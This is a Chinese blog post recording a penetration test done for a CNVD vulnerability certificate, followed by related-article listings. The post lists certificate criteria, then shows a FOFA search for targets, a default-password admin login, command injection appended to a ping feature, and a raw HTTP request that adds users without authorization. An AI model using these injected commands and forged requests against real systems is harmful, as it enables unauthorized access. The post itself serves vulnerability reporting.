2024-06-05-记一次cnvd渗透

于 2024-06-05 10:47:53 发布
阅读量550 收藏 7
点赞数 4
文章标签: 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73581247/article/details/139465967
版权

前言:挖src挖郁闷了,闲来无事选择挖一个cnvd来练练手,本次的漏洞都没啥难度,企查查资产过了5000万

说一下cnvd证书的下放标准

对于中危及中危以上通用型漏洞(CVSS2.0基准评分超过4.0分),以及涉及党政机关、重要行业单位、科研院所、重要企事业单位(如:中央国有大型企业、部委直属事业单位等)的高危事件型漏洞(后续对事件型漏洞证明颁发标准将参考中央网信办颁布的关键基础设施相关定义和分类),CNVD将给予原创漏洞证明(即CNVD漏洞证书,电子版),该证明可通过编号在CNVD官方网站进行查询跟踪。时限要求:按周对上一周归档漏洞且满足证书颁发条件的进行批量制作。

事件型:高危 重要机构
通用型:中危及以上(评分4.0) 注册资金5000w以上,黑盒的测试案例10或以上(3复现+7其他案例,其他案例不要求复现),白盒的得有源码以及提供漏洞处代码调试过程,包含截图和原因。

过程:

fofa寻找目标

app=“xx目标系统”
在这里插入图片描述

admin ,123456 成功登录管理员用户(弱口令yyds)

RCE

在这里插入图片描述

发现这里有一个ping 的功能,我想这里应该会存在rce漏洞

ping 127.0.0.1 -c 4 ;whoami (成功rce)
在这里插入图片描述

在这里插入图片描述

越权

在这里插入图片描述

`POST xxxxxxxxx HTTP/1.1
Host: xxxxx
Content-Length: 180
Accept: application/json, text/plain, /
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: xxxxxxxxxxxxxxxxxxxx
Referer: xxxxxxxxxxxxxxxx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{“jsonrpc”:“2.0”,“method”:“call”,“params”:[“635F7A20A38A4072899C14B3535CFBF5”,“admin”,“sessionAddUser”,{“username”:“123456”,“password”:“554e36b4db2bc61b606ca16e756b1f7d”}],“id”:11}`

这里将admin,换成任意用户即可添加成功
在这里插入图片描述

fann@qiu
关注
对某小程序的一次渗透
布啦啦
03-25 662
最近报了一个驾校,然后在报名回家以后,就开始疯狂的挂科目一的时长,突然想到这个小程序会不会存在漏洞呢,如果发现了,还可以去CNVD(https://www.cnvd.org.cn/)报一下,一是拿个积分,二是间接修复一下漏洞,毕竟自己的所有信息都在这个小程序里,不想自己有一天因为它存在什么漏洞,导致自己的信息被人偷走,所以本着保护自己的原则,我开始了一次【试探】。具体是哪个小程序,这里我就不说啦,漏洞已经报到CNVD了,写本文只是做一个分享。
CVSS评分维度
01-02
文档取材国际通用标准,安全漏洞评分标准,CVSS标准。
2021年CNVD漏洞挖掘经验
szgyunyun的博客
03-05 1万+
一、关于证书获取条件,先看一下CNVD的官方解释 归档漏洞的证书颁发条件为:(1)对于中危及中危以上通用型漏洞(CVSS2.0基准评分超过4.0分)(除小厂商的产品、非重要APP、黑盒测试案例不满10起等不颁发证书),(2)涉及电信行业单位(中国移动、中国联通、中国电信及中国铁塔公司)和中央部委级别(不含直属事业单位)的高危事件型漏洞,CNVD将给予原创漏洞证明(即CNVD漏洞证书,电子版),该证明可通过编号在CNVD官方网站进行查询跟踪。 时限要求:按周对上一周归档漏洞且满足证书颁发条件的进行批量制作。(
CVSS2.0 安全漏洞基础评分指标说明及计算公式
编程随手记
01-24 6429
用于计算安全漏洞评分
eCVSS评分系统介绍及计算公式(基于CVSS2.0版的一个分支)-ISO 11073-40101-2022法规解读
最新发布
weixin_57903997的博客
02-26 74
CVSS的原始版本设计用于解决仅软件系统,并在软件系统在现场后创建分数。在开发该标准的过程中,需要对CVSS进行更改,以支持PHDs/ PoCDs,并在设计期间创建分数,以指导系统的开发。因此,嵌入式通用漏洞评分系统(eCVSS-embedded Common Vulnerability Scoring System)被创建为CVSS 2.0 (FIRST [B2])的一个稍微修改的分支。-由于eCVSS中的评分是在设计期间进行的,因此通过将三个指标强制为中性值,有效地消除了时间组。
cvss评分及漏洞矢量
General_zy的博客
10-25 5120
CVSS2.0对漏洞等级的定义有低、中、高三个级别,CVSS3.0开始补充了“严重”这个级别。C(Confidentiality Impact)代表机密性影响度。A(Availability Impact)代表可用性影响度。PR(Privileges Required)代表权限要求。AC(Attack Complexity)代表攻击复杂度。I(Integrity Impact)代表完整性影响度。AV(Attack Vector)代表攻击途径。S(Scope)代表作用域。
CVSS评分策略分析及近年来满分漏洞盘点
C20220511的博客
05-13 9523
01 引言 近两年正如许多安全公司的研究员亲身经历的那样,网络攻击量显著增加,重大漏洞被相继爆出并伴随着在野利用。如去年年底的log4shell(CVE-2021-44228)和今年爆出的spring4shell(CVE-2022-22965)在安全圈里都掀起了不小的风浪。由于在分析spring漏洞时cve编号还没有出来,自评影响力也没那么“核弹级”,后续就没怎么关注这个漏洞的。最近突然想看看这个漏洞的CVSS评分,看看官方是怎么给这漏洞做影响力定义的。查看后发现该漏洞CVSSV2.0评分为7.5,CV.
考虑漏洞依赖的相关指标计算
weixin_43915129的博客
08-10 697
在计算攻击图评估指标的时候,通常会用到CVSS得分,但这往往会导致漏洞信息的缺失。我们往往只关心这个漏洞的得分是多少,然后直接使用这个得分计算,而忽视了实际的网络拓扑环境,这是不合理的,本文提出了一种评估漏洞之间依赖关系的方法。...
「 网络安全常用术语解读 」通用漏洞评分系统CVSS详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
03-11 9373
CVSS全称是Common Vulnerability Scoring System,中文翻译为通用漏洞评分系统,CVSS是一个用于沟通软件漏洞特征和严重性的开放框架,它由FIRST(Forum of Incident Response and Security Teams)定义和维护。CVSS提供了一种方法来获取漏洞的主要特征,并生成反映其严重性的数值评分,取值范围[0,10],取值越高表明漏洞越严重,主要用于帮助组织或企业在漏洞管理流程中评估与定级漏洞。
CNVD通用漏洞挖掘经验分享
szgyunyun的博客
12-02 7871
一、首先说一下通用漏洞很好得,但是证书确实不是很容易(大佬请无视)。 二、关于证书获取条件,先看一下CNVD的官方解释 归档漏洞的证书颁发条件为:(1)对于中危及中危以上通用型漏洞(CVSS2.0基准评分超过4.0分)(除小厂商的产品、非重要APP、黑盒测试案例不满10起等不颁发证书),(2)涉及电信行业单位(中国移动、中国联通、中国电信及中国铁塔公司)和中央部委级别(不含直属事业单位)的高危事件型漏洞,CNVD将给予原创漏洞证明(即CNVD漏洞证书,电子版),该证明可通过编号在CNVD官方网站进行查询跟踪
CVSS3.0说明书
11-07
通用弱点评价体系(CVSS)是由NIAC开发、FIRST维护的一个开放并且能够被产品厂商免费采用的标准。利用该标准,可以对弱点进行评分,进而帮助我们判断修复不同弱点的优先等级。
Web渗透测试-实战 方法 思路 总结
m0_55595611的博客
02-21 9440
尽可能的搜集目标的信息 端口信息 DNS信息 员工邮箱 信息搜集的分类 1、主动式信息搜集(可获取到的信息较多,但易被目标发现) 2、通过直接发起与被测目标网络之间的互动来获取相关信息,如通过Nmap扫描目标系统。 3、被动式信息搜集(搜集到的信息较少,但不易被发现) 4、通过第三方服务来获取目标网络相关信息。如通过搜索引擎方式来搜集信息。 搜索引擎 Google hacking 常用搜索语法: intitle:KEYWORD //搜索网页标题中含有关键词的网页 intext:KEYWORD //搜索站
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5545
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
一次实战中巧用Nday拿下shell
jammny
12-24 1600
前言 在某次渗透测试过程中遇到FastAdmin搭建的网站,而FastAdmin是一款基于ThinkPHP5+Bootstrap的极速后台开发框架。 指纹识别 访问目标页面是长这个样子的: 通过查看源代码出现的指纹,可以肯定使用的FastAdmin框架。 历史漏洞利用 CNVD历史漏洞查询: 显然以我的爆破水平和运气,后台是进不去的。在收集一下其他信息: 通过学习文章知道当位于application/config.php文件中usercenter开启时: 可以在个人用户
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 993
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
安全漏洞评分系统(CVSS)
热门推荐
KerryRuan的专栏
04-08 3万+
CVSS : Common Vulnerability Scoring System,即“通用漏洞评分系统”,是一个“行业公开标准,其被设计用来评测漏洞的严重程度,并帮助确定所需反应的紧急度和重要度”。 CVSS是安全内容自动化协议(SCAP)[2]的一部分,通常CVSS同CVE一同由美国国家漏洞库(NVD)发布并保持数据的更新。 CVSS的目标是为所有软件安全漏洞提供一个严重程度的评级
MiniO未授权SSRF漏洞(CVE-2021-21287)
xiaobai_20190815的博客
06-09 7019
Apache License MiniO未授权SSRF漏洞(CVE-2021-21287)
cnvd通用型漏洞挖掘小知识(1)
qq_52074678的博客
03-17 1万+
一。什么是通用型漏洞 1.通用型漏洞指某个系统,软件,应用等对应的漏洞 比如TP的命令执行,dz的SQL注入等等,cnvd漏洞列表展示出来的都是通用型漏洞 归档漏洞证书颁发条件:(1)对于中危及中危以上通用型漏洞(CVSS2.0基准评分超过4.0分) (除小厂商的产品,非重要APP,黑盒测试案例不满10例等不颁发证书)(注:大厂商的判断标准为(注册资金5000万以上,或者案例涉及省部级以上单位的)) Tips:通用型漏洞需要提供互联网案例或者是本地代码审计证明其通用性(包括跟进函数和调试代码过程),如果
cnvd-2023-69477
12-08
cnvd-2023-69477是一个由国家信息安全漏洞共享平台发布的漏洞通告编号,该漏洞通告是针对特定软件或硬件产品的安全漏洞描述和修复建议的一个标识。根据cnvd-2023-69477的描述,这个漏洞可能会导致系统的信息泄露、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值